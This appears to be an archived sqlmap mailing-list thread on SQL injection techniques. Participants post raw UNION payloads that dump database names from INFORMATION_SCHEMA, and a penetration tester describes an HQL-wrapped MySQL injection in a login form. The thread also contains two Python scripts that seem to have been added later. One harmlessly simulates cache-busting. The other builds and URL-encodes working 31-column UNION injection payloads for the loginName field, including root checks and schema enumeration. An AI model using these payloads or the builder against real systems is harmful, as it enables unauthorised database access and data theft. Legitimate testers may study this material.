Currently, it seems that sqlmap will use a payload such as the following if a UNIONable parameter is found that can only return one row in order for data to be exfil’ed.

-16301 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71787a7871,IFNULL(CAST(schema_name AS CHAR),0x20),0x716a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL

When enumerating databases in an injection like this, sqlmap will make a single request per db name (note the LIMIT clause). This is a bit inefficient. I understand there may be length limitations to query string parameters, but I’m curious why sqlmap wouldn’t use a more efficient payload, such as the following.

-16301 UNION ALL SELECT NULL,NULL,CONCAT(0x41414141, (SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL

Error-based payloads certainly have length limitations in the data they can get out per request, but is there something preventing sqlmap from implementing a more efficient single-row UNION strategy when exfiltrating data?

Let me know if this doesn’t make sense. |
From: OBADARE O. <oba...@gm...> - 2017-04-20 10:50:15
|
Hi,

I am trying to fetch a database name through SQL injection but keep getting a gibberish name/information. Has anyone encountered this kind of problem and if yes, how did you resolve it? Kindly find below the screenshot. |
From: Miroslav S. <mir...@gm...> - 2017-02-28 12:18:01
|
p.s. with the latest commit I've (at least) prevented that the last value is the same as the following "randomized" (e.g. original 1 -> random 1 <- because this one is chosen as randint(1,9) and there was a chance that it will get the original value)

On Tue, Feb 28, 2017 at 1:12 PM, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> It goes like this. Parameter is randomized, BUT, the parameter value holds the original form. This means that if your parameter is single digit, the following request will be a random value chosen from the [0-9]. This basically means that there is a chance that the following "random" value could be the same as the last one AND that you'll soon be left without any new values (after avg. 8-9 requests).
>
> Hence, use some larger "original" value for that same parameter you want to randomize :)
>
> Bye
>
> On Tue, Feb 28, 2017 at 12:32 AM, Brandon Perry <bpe...@gm...> wrote:
> >
> > > On Feb 27, 2017, at 4:28 PM, Brandon Perry <bpe...@gm...> wrote:
> > >
> > > Hi, testing --randomize for the first time.
> > >
> > > I have an injection that is certainly boolean-injectable as I can exploit by hand, but the content of the response can change if the url requested seems to have been hit before.
> > >
> > > For instance, if I do GET /fdsa/1%20or%201=1, 100 bytes are returned. If I do it again, I get 150 bytes back from now on.
> > >
> > > If I append a garbage HTTP parameter and randomize the value in the parameter, I always get 100 bytes back.
> > >
> > > It’s a weird injection, but sqlmap seems to think that the page contents are changing during warm-up, even if I append a garbage parameter and tell --randomize to randomize it.
> > >
> > > [16:20:14] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
> > >
> > > I have verified by hand that changing the HTTP parameter value each request results in the same data from the injection being returned from the server. It seems --randomize isn’t being respected in the very beginning.
> > >
> > > Any thoughts? Hopefully this makes sense.
> >
> > Doing testing through Burp Suite, I see that the HTTP parameter is indeed randomized, so I am not sure what’s up yet.
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm |
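Miroslav's explanation is that the randomized value keeps the form of the original, so a one-digit seed can only ever produce ten different values and the junk parameter stops busting the cache after a handful of requests. The script below is an added example for this thread, not sqlmap code: randomize_like is an approximation of that form-preserving randomization (same length, same character classes), StickyTarget is a constructed stand-in for the behaviour Brandon describes (first hit on a URL returns 100 bytes, every later hit on the same URL returns 150), and stability_check repeats the request the way a warm-up comparison would and counts the responses that differ from the first. The path and the parameter name cb are constructed.

```python
"""Why a single-digit cache-buster does not keep a sticky target stable.

Added example for this thread, not sqlmap code. StickyTarget is a constructed
stand-in for the target Brandon describes; randomize_like approximates the
behaviour Miroslav describes (the random value keeps the original's form).
"""
import random
import string


def randomize_like(value: str, rng: random.Random) -> str:
    """Same length and character classes as `value`, random content."""
    out = []
    for ch in value:
        if ch.isdigit():
            out.append(rng.choice(string.digits))
        elif ch.isalpha():
            pool = string.ascii_lowercase if ch.islower() else string.ascii_uppercase
            out.append(rng.choice(pool))
        else:
            out.append(ch)                      # punctuation is kept as-is
    return "".join(out)


def value_space(value: str) -> int:
    """How many distinct outputs randomize_like can produce for this shape."""
    n = 1
    for ch in value:
        n *= 10 if ch.isdigit() else 26 if ch.isalpha() else 1
    return n


class StickyTarget:
    """Constructed target: a URL changes its response after its first hit."""

    def __init__(self):
        self.seen = set()

    def get(self, url: str) -> bytes:
        if url in self.seen:
            return b"x" * 150
        self.seen.add(url)
        return b"x" * 100


def stability_check(original: str, requests: int, seed: int = 1) -> int:
    """Repeat the request with a freshly randomized cache-buster and count the
    responses that differ from the first one. Anything above zero is the
    situation that produces the 'target URL is not stable' warning."""
    rng = random.Random(seed)
    target = StickyTarget()
    base = "/fdsa/1%20or%201=1?cb="              # path from the thread plus a constructed junk parameter
    first = target.get(base + randomize_like(original, rng))
    return sum(target.get(base + randomize_like(original, rng)) != first
               for _ in range(requests - 1))


if __name__ == "__main__":
    for seed_value in ("1", "1234567890"):
        print(f"cb={seed_value!r}: {value_space(seed_value)} possible values, "
              f"{stability_check(seed_value, 20)} unstable responses in 20 requests")
```

With the seed 1 at most ten URLs are ever distinct, so at least ten of twenty requests land on an already-seen URL and come back with the other body; with a ten-digit seed the value space is 10^10 and the same twenty requests are, for all practical purposes, all fresh. That is the whole reason for the advice to start from a larger original value.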
From: Miroslav S. <mir...@gm...> - 2017-02-28 12:12:54
|
Hi.

It goes like this. Parameter is randomized, BUT, the parameter value holds the original form. This means that if your parameter is single digit, the following request will be a random value chosen from the [0-9]. This basically means that there is a chance that the following "random" value could be the same as the last one AND that you'll soon be left without any new values (after avg. 8-9 requests).

Hence, use some larger "original" value for that same parameter you want to randomize :)

Bye

On Tue, Feb 28, 2017 at 12:32 AM, Brandon Perry <bpe...@gm...> wrote:
>
> > On Feb 27, 2017, at 4:28 PM, Brandon Perry <bpe...@gm...> wrote:
> >
> > Hi, testing --randomize for the first time.
> >
> > I have an injection that is certainly boolean-injectable as I can exploit by hand, but the content of the response can change if the url requested seems to have been hit before.
> >
> > For instance, if I do GET /fdsa/1%20or%201=1, 100 bytes are returned. If I do it again, I get 150 bytes back from now on.
> >
> > If I append a garbage HTTP parameter and randomize the value in the parameter, I always get 100 bytes back.
> >
> > It’s a weird injection, but sqlmap seems to think that the page contents are changing during warm-up, even if I append a garbage parameter and tell --randomize to randomize it.
> >
> > [16:20:14] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
> >
> > I have verified by hand that changing the HTTP parameter value each request results in the same data from the injection being returned from the server. It seems --randomize isn’t being respected in the very beginning.
> >
> > Any thoughts? Hopefully this makes sense.
>
> Doing testing through Burp Suite, I see that the HTTP parameter is indeed randomized, so I am not sure what’s up yet.

--
Miroslav Stampar
http://about.me/stamparm |
From: Brandon P. <bpe...@gm...> - 2017-02-27 23:32:26
|
> On Feb 27, 2017, at 4:28 PM, Brandon Perry <bpe...@gm...> wrote:
>
> Hi, testing --randomize for the first time.
>
> I have an injection that is certainly boolean-injectable as I can exploit by hand, but the content of the response can change if the url requested seems to have been hit before.
>
> For instance, if I do GET /fdsa/1%20or%201=1, 100 bytes are returned. If I do it again, I get 150 bytes back from now on.
>
> If I append a garbage HTTP parameter and randomize the value in the parameter, I always get 100 bytes back.
>
> It’s a weird injection, but sqlmap seems to think that the page contents are changing during warm-up, even if I append a garbage parameter and tell --randomize to randomize it.
>
> [16:20:14] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
>
> I have verified by hand that changing the HTTP parameter value each request results in the same data from the injection being returned from the server. It seems --randomize isn’t being respected in the very beginning.
>
> Any thoughts? Hopefully this makes sense.

Doing testing through Burp Suite, I see that the HTTP parameter is indeed randomized, so I am not sure what’s up yet. |
From: Brandon P. <bpe...@gm...> - 2017-02-27 22:28:55
|
Hi, testing --randomize for the first time.

I have an injection that is certainly boolean-injectable as I can exploit by hand, but the content of the response can change if the url requested seems to have been hit before.

For instance, if I do GET /fdsa/1%20or%201=1, 100 bytes are returned. If I do it again, I get 150 bytes back from now on.

If I append a garbage HTTP parameter and randomize the value in the parameter, I always get 100 bytes back.

It’s a weird injection, but sqlmap seems to think that the page contents are changing during warm-up, even if I append a garbage parameter and tell --randomize to randomize it.

[16:20:14] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on

I have verified by hand that changing the HTTP parameter value each request results in the same data from the injection being returned from the server. It seems --randomize isn’t being respected in the very beginning.

Any thoughts? Hopefully this makes sense. |
From: Robin W. <ro...@di...> - 2017-02-25 07:46:22
|
Thanks, I'll give it a go specifying the number of columns when I'm next allowed to test. It might also cause problems that a couple of the columns have to be dates so might have to resort to scripting it by hand.

Robin

On Sat, 25 Feb 2017, 07:34 Miroslav Stampar, <mir...@gm...> wrote:
> p.s. you have a very specific case. I had a couple of similar and had to make my own script(s). Basically, data is provided to two separate DBMSes, while you are targeting the second one. To get to it you have to make a payload that won't make problems with the first one. In your case I would try to provide only valid options to sqlmap (e.g. --data "...?logname=admin" --technique=U --union-cols=31 --dbms=mysql) and cross the fingers. If that fails you'll have to make a case specific script. For MySQL enumeration queries you can always take a look into xml/payloads.xml
>
> On Sat, Feb 25, 2017 at 8:17 AM, Miroslav Stampar <mir...@gm...> wrote:
>
> "Do you know the maximum number of fields the union will do" - by default 1-10. If there are more techniques usable (e.g. boolean), it will extend it. Also, if ORDER BY is usable it will try to find the number of columns without limitations. If you want to manually extend, use --union-cols (e.g. 1-100)
>
> Bye
>
> On Sat, Feb 25, 2017 at 12:28 AM, Robin Wood <ro...@di...nja> wrote:
>
> Annoyingly my test window is closed and I'll probably not get to talk to the client till Monday but will try this out on a test box just to watch the traffic and see if it is doing what I think should work.
>
> Ta
>
> Robin
>
> On Fri, 24 Feb 2017, 23:23 Chris Oakley, <chr...@gm...> wrote:
>
> I *think* (going from memory here) that it's higher than that by default. There's also the --union-cols=30-40, so you should be good
>
> On 24 February 2017 at 18:17, Robin Wood <ro...@di...nja> wrote:
>
> I hadn't tried the custom injection point, I'll give that a try. Do you know the maximum number of fields the union will do? I was thinking about it after shutting the machine down and think it's 30 so will need to increase that.
>
> Robin
>
> On Fri, 24 Feb 2017, 23:14 Chris Oakley, <chr...@gm...> wrote:
>
> I assume you've tried * for custom injection point and --technique=U?
>
> Whether or not it'll dance with HQL is another question entirely.
>
> On 24 February 2017 at 16:44, Robin Wood <ro...@di...nja> wrote:
>
> I've just found an instance of Hibernate Query Language injection that lets me get at an underlying MySQL database if I inject in the right way, some examples I've got are:
>
> loginName=a - works and gives 200
> loginName=' - fails with HQL error and 500
> loginName=a' or 'a'='a - works and gives 200
> loginName=a\'' - gets through HQL and then generates a MySQL error in a where clause. The injection gets converted to where NAME='a\'''
>
> With some playing I've found that this is a valid injection and they are running as root as I get a 500 back when I supply root, a 200 when I give something else.
>
> loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" from users where user()="root@localhost" -- '='1
>
> The 500 is because some of the stuff from the union isn't being handled correctly by the page, the 200 is because the union doesn't return any data so the first bit (basically a=a) is returning valid data so getting through the rest of the parsing.
>
> So I think what I need to do is to tell SQLMap that it is a union injection with 31 fields and that the injection needs to go into here:
>
> loginName=a' and 'a\''="a" <INJECT> -- '='1
>
> Can I do this?
>
> I've got all this set up and running in Burp so I can test things out if anyone needs me to.
>
> Robin
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
> --
> Miroslav Stampar
> http://about.me/stamparm |
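The thread ends with two routes: hand sqlmap the wrapper with a `*` custom injection marker and `--technique=U --union-cols=31 --dbms=mysql`, or, as Miroslav suggests when the double-DBMS path gets in the way, script the case by hand. The script below is an added example of the second route, not sqlmap's code and not Robin's: it builds the HQL-surviving wrapper from the posted payload (`a' and 'a\''="a" ... -- '='1`), fills the 31 columns with type-correct values so the page does not choke on a date column, and counts the SELECT-list cells before sending. The column layout, with dates at positions 27, 30 and 31, is read off Robin's working payload; the `users` table and the `user()="root@localhost"` check come from the thread; the form field name is loginName as posted. Everything else (the integer fillers, the group_concat example) is constructed here.

```python
"""Type-correct UNION payload for the HQL-wrapped MySQL injection in this thread.

Added example, not sqlmap code. The 31-column shape and the three date columns
(27, 30, 31) are read off the working payload Robin posted; the users table and
the root check come from the thread; fillers and the sample sub-select are
constructed here.
"""
from urllib.parse import urlencode

# Per-column fillers: plain integers are accepted everywhere except where the
# posted payload had to use "2001-01-01".
COLUMN_TYPES = ["int"] * 31
for pos in (27, 30, 31):
    COLUMN_TYPES[pos - 1] = "date"

FILLERS = {
    "int": lambda i: str(i),            # column number: a reflected cell then tells you which column it is
    "date": lambda i: '"2001-01-01"',
}

# a' closes the HQL string; 'a\''="a" gets through HQL and becomes a true
# comparison in MySQL; -- '='1 comments out whatever the application appends.
PREFIX = "a' and 'a\\''=\"a\" "
SUFFIX = " -- '='1"


def union_select(expr: str, inject_col: int, types=COLUMN_TYPES, where: str = None) -> str:
    """SELECT list with `expr` in column inject_col (1-based) and fillers elsewhere."""
    if not 1 <= inject_col <= len(types):
        raise ValueError("inject_col out of range")
    cells = [expr if i == inject_col else FILLERS[t](i)
             for i, t in enumerate(types, start=1)]
    sql = "union select " + ",".join(cells)
    if where:
        sql += " from users where " + where     # users table and condition as in the thread
    return sql


def login_name(expr: str, inject_col: int, where: str = None) -> str:
    """Complete loginName value, ready to be URL-encoded."""
    return PREFIX + union_select(expr, inject_col, where=where) + SUFFIX


def sqlmap_marker() -> str:
    """The same wrapper with sqlmap's '*' custom injection marker in place of the
    UNION, for --data together with --technique=U --union-cols=31 --dbms=mysql."""
    return PREFIX + "*" + SUFFIX


def column_count(value: str) -> int:
    """Sanity check before sending: count top-level cells of the SELECT list,
    ignoring commas inside sub-selects and stopping at the outer FROM."""
    body = value[len(PREFIX):]
    if not body.startswith("union select "):
        raise ValueError("not a payload built here")
    body = body[len("union select "):]
    depth, n = 0, 1
    for i, ch in enumerate(body):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif depth == 0 and ch == ",":
            n += 1
        elif depth == 0 and body.startswith(" from ", i):
            break
    return n


def form_body(value: str) -> str:
    """application/x-www-form-urlencoded body for the POST."""
    return urlencode({"loginName": value})


if __name__ == "__main__":
    root_check = login_name("@@version", 1, where='user()="root@localhost"')
    print(root_check)
    print(column_count(root_check), "columns")
    dbs = login_name("(select group_concat(schema_name,0x2c) from information_schema.schemata)", 1)
    print(form_body(dbs))
    print(form_body(sqlmap_marker()))
```

Putting the column number in every integer filler is deliberate: when the page reflects one of them you learn which of the 31 columns is visible, which is what decides inject_col. If sqlmap's own run with `--union-cols=31` fails on the date columns, this builder is the "case specific script" fallback, and the enumeration expressions to drop into it can be taken from sqlmap's xml/payloads.xml as Miroslav suggests.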
From: Miroslav S. <mir...@gm...> - 2017-02-25 07:34:20
|
p.s. you have a very specific case. I had a couple of similar and had to make my own script(s). Basically, data is provided to two separate DBMSes, while you are targeting the second one. To get to it you have to make a payload that won't make problems with the first one. In your case I would try to provide only valid options to sqlmap (e.g. --data "...?logname=admin" --technique=U --union-cols=31 --dbms=mysql) and cross the fingers. If that fails you'll have to make a case specific script. For MySQL enumeration queries you can always take a look into xml/payloads.xml

On Sat, Feb 25, 2017 at 8:17 AM, Miroslav Stampar <mir...@gm...> wrote:
> "Do you know the maximum number of fields the union will do" - by default 1-10. If there are more techniques usable (e.g. boolean), it will extend it. Also, if ORDER BY is usable it will try to find the number of columns without limitations. If you want to manually extend, use --union-cols (e.g. 1-100)
>
> Bye
>
> On Sat, Feb 25, 2017 at 12:28 AM, Robin Wood <ro...@di...nja> wrote:
>
> > Annoyingly my test window is closed and I'll probably not get to talk to the client till Monday but will try this out on a test box just to watch the traffic and see if it is doing what I think should work.
> >
> > Ta
> >
> > Robin
> >
> > On Fri, 24 Feb 2017, 23:23 Chris Oakley, <chr...@gm...> wrote:
> >
> > > I *think* (going from memory here) that it's higher than that by default. There's also the --union-cols=30-40, so you should be good
> > >
> > > On 24 February 2017 at 18:17, Robin Wood <ro...@di...nja> wrote:
> > >
> > > I hadn't tried the custom injection point, I'll give that a try. Do you know the maximum number of fields the union will do? I was thinking about it after shutting the machine down and think it's 30 so will need to increase that.
> > >
> > > Robin
> > >
> > > On Fri, 24 Feb 2017, 23:14 Chris Oakley, <chr...@gm...> wrote:
> > >
> > > I assume you've tried * for custom injection point and --technique=U?
> > >
> > > Whether or not it'll dance with HQL is another question entirely.
> > >
> > > On 24 February 2017 at 16:44, Robin Wood <ro...@di...nja> wrote:
> > >
> > > I've just found an instance of Hibernate Query Language injection that lets me get at an underlying MySQL database if I inject in the right way, some examples I've got are:
> > >
> > > loginName=a - works and gives 200
> > > loginName=' - fails with HQL error and 500
> > > loginName=a' or 'a'='a - works and gives 200
> > > loginName=a\'' - gets through HQL and then generates a MySQL error in a where clause. The injection gets converted to where NAME='a\'''
> > >
> > > With some playing I've found that this is a valid injection and they are running as root as I get a 500 back when I supply root, a 200 when I give something else.
> > >
> > > loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" from users where user()="root@localhost" -- '='1
> > >
> > > The 500 is because some of the stuff from the union isn't being handled correctly by the page, the 200 is because the union doesn't return any data so the first bit (basically a=a) is returning valid data so getting through the rest of the parsing.
> > >
> > > So I think what I need to do is to tell SQLMap that it is a union injection with 31 fields and that the injection needs to go into here:
> > >
> > > loginName=a' and 'a\''="a" <INJECT> -- '='1
> > >
> > > Can I do this?
> > >
> > > I've got all this set up and running in Burp so I can test things out if anyone needs me to.
> > >
> > > Robin
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2017-02-25 07:17:39
|
"Do you know the maximum number of fields the union will do" - by default 1-10. If there are more techniques usable (e.g. boolean), it will extend it. Also, if ORDER BY is usable it will try to find the number of columns without limitations. If you want to manually extend, use --union-cols (e.g. 1-100)

Bye

On Sat, Feb 25, 2017 at 12:28 AM, Robin Wood <ro...@di...nja> wrote:
> Annoyingly my test window is closed and I'll probably not get to talk to the client till Monday but will try this out on a test box just to watch the traffic and see if it is doing what I think should work.
>
> Ta
>
> Robin
>
> On Fri, 24 Feb 2017, 23:23 Chris Oakley, <chr...@gm...> wrote:
>
> > I *think* (going from memory here) that it's higher than that by default. There's also the --union-cols=30-40, so you should be good
> >
> > On 24 February 2017 at 18:17, Robin Wood <ro...@di...nja> wrote:
> >
> > I hadn't tried the custom injection point, I'll give that a try. Do you know the maximum number of fields the union will do? I was thinking about it after shutting the machine down and think it's 30 so will need to increase that.
> >
> > Robin
> >
> > On Fri, 24 Feb 2017, 23:14 Chris Oakley, <chr...@gm...> wrote:
> >
> > I assume you've tried * for custom injection point and --technique=U?
> >
> > Whether or not it'll dance with HQL is another question entirely.
> >
> > On 24 February 2017 at 16:44, Robin Wood <ro...@di...nja> wrote:
> >
> > I've just found an instance of Hibernate Query Language injection that lets me get at an underlying MySQL database if I inject in the right way, some examples I've got are:
> >
> > loginName=a - works and gives 200
> > loginName=' - fails with HQL error and 500
> > loginName=a' or 'a'='a - works and gives 200
> > loginName=a\'' - gets through HQL and then generates a MySQL error in a where clause. The injection gets converted to where NAME='a\'''
> >
> > With some playing I've found that this is a valid injection and they are running as root as I get a 500 back when I supply root, a 200 when I give something else.
> >
> > loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" from users where user()="root@localhost" -- '='1
> >
> > The 500 is because some of the stuff from the union isn't being handled correctly by the page, the 200 is because the union doesn't return any data so the first bit (basically a=a) is returning valid data so getting through the rest of the parsing.
> >
> > So I think what I need to do is to tell SQLMap that it is a union injection with 31 fields and that the injection needs to go into here:
> >
> > loginName=a' and 'a\''="a" <INJECT> -- '='1
> >
> > Can I do this?
> >
> > I've got all this set up and running in Burp so I can test things out if anyone needs me to.
> >
> > Robin

--
Miroslav Stampar
http://about.me/stamparm |
From: Robin W. <ro...@di...> - 2017-02-24 23:28:27
|
Annoyingly my test window is closed and I'll probably not get to talk to the client till Monday but will try this out on a test box just to watch the traffic and see if it is doing what I think should work.

Ta

Robin

On Fri, 24 Feb 2017, 23:23 Chris Oakley, <chr...@gm...> wrote:
> I *think* (going from memory here) that it's higher than that by default. There's also the --union-cols=30-40, so you should be good
>
> On 24 February 2017 at 18:17, Robin Wood <ro...@di...nja> wrote:
>
> I hadn't tried the custom injection point, I'll give that a try. Do you know the maximum number of fields the union will do? I was thinking about it after shutting the machine down and think it's 30 so will need to increase that.
>
> Robin
>
> On Fri, 24 Feb 2017, 23:14 Chris Oakley, <chr...@gm...> wrote:
>
> I assume you've tried * for custom injection point and --technique=U?
>
> Whether or not it'll dance with HQL is another question entirely.
>
> On 24 February 2017 at 16:44, Robin Wood <ro...@di...nja> wrote:
>
> I've just found an instance of Hibernate Query Language injection that lets me get at an underlying MySQL database if I inject in the right way, some examples I've got are:
>
> loginName=a - works and gives 200
> loginName=' - fails with HQL error and 500
> loginName=a' or 'a'='a - works and gives 200
> loginName=a\'' - gets through HQL and then generates a MySQL error in a where clause. The injection gets converted to where NAME='a\'''
>
> With some playing I've found that this is a valid injection and they are running as root as I get a 500 back when I supply root, a 200 when I give something else.
>
> loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" from users where user()="root@localhost" -- '='1
>
> The 500 is because some of the stuff from the union isn't being handled correctly by the page, the 200 is because the union doesn't return any data so the first bit (basically a=a) is returning valid data so getting through the rest of the parsing.
>
> So I think what I need to do is to tell SQLMap that it is a union injection with 31 fields and that the injection needs to go into here:
>
> loginName=a' and 'a\''="a" <INJECT> -- '='1
>
> Can I do this?
>
> I've got all this set up and running in Burp so I can test things out if anyone needs me to.
>
> Robin |
From: Chris O. <chr...@gm...> - 2017-02-24 23:23:40
|
I *think* (going from memory here) that it's higher than that by default. There's also the --union-cols=30-40, so you should be good

On 24 February 2017 at 18:17, Robin Wood <ro...@di...nja> wrote:
> I hadn't tried the custom injection point, I'll give that a try. Do you know the maximum number of fields the union will do? I was thinking about it after shutting the machine down and think it's 30 so will need to increase that.
>
> Robin
>
> On Fri, 24 Feb 2017, 23:14 Chris Oakley, <chr...@gm...> wrote:
>
> > I assume you've tried * for custom injection point and --technique=U?
> >
> > Whether or not it'll dance with HQL is another question entirely.
> >
> > On 24 February 2017 at 16:44, Robin Wood <ro...@di...nja> wrote:
> >
> > I've just found an instance of Hibernate Query Language injection that lets me get at an underlying MySQL database if I inject in the right way, some examples I've got are:
> >
> > loginName=a - works and gives 200
> > loginName=' - fails with HQL error and 500
> > loginName=a' or 'a'='a - works and gives 200
> > loginName=a\'' - gets through HQL and then generates a MySQL error in a where clause. The injection gets converted to where NAME='a\'''
> >
> > With some playing I've found that this is a valid injection and they are running as root as I get a 500 back when I supply root, a 200 when I give something else.
> >
> > loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" from users where user()="root@localhost" -- '='1
> >
> > The 500 is because some of the stuff from the union isn't being handled correctly by the page, the 200 is because the union doesn't return any data so the first bit (basically a=a) is returning valid data so getting through the rest of the parsing.
> >
> > So I think what I need to do is to tell SQLMap that it is a union injection with 31 fields and that the injection needs to go into here:
> >
> > loginName=a' and 'a\''="a" <INJECT> -- '='1
> >
> > Can I do this?
> >
> > I've got all this set up and running in Burp so I can test things out if anyone needs me to.
> >
> > Robin |
From: Robin W. <ro...@di...> - 2017-02-24 23:18:12
|
I hadn't tried the custom injection point, I'll give that a try. Do you know the maximum number of fields the union will do? I was thinking about it after shutting the machine down and think it's 30 so will need to increase that.

Robin

On Fri, 24 Feb 2017, 23:14 Chris Oakley, <chr...@gm...> wrote:
> I assume you've tried * for custom injection point and --technique=U?
>
> Whether or not it'll dance with HQL is another question entirely.
>
> On 24 February 2017 at 16:44, Robin Wood <ro...@di...nja> wrote:
>
> I've just found an instance of Hibernate Query Language injection that lets me get at an underlying MySQL database if I inject in the right way, some examples I've got are:
>
> loginName=a - works and gives 200
> loginName=' - fails with HQL error and 500
> loginName=a' or 'a'='a - works and gives 200
> loginName=a\'' - gets through HQL and then generates a MySQL error in a where clause. The injection gets converted to where NAME='a\'''
>
> With some playing I've found that this is a valid injection and they are running as root as I get a 500 back when I supply root, a 200 when I give something else.
>
> loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" from users where user()="root@localhost" -- '='1
>
> The 500 is because some of the stuff from the union isn't being handled correctly by the page, the 200 is because the union doesn't return any data so the first bit (basically a=a) is returning valid data so getting through the rest of the parsing.
>
> So I think what I need to do is to tell SQLMap that it is a union injection with 31 fields and that the injection needs to go into here:
>
> loginName=a' and 'a\''="a" <INJECT> -- '='1
>
> Can I do this?
>
> I've got all this set up and running in Burp so I can test things out if anyone needs me to.
>
> Robin |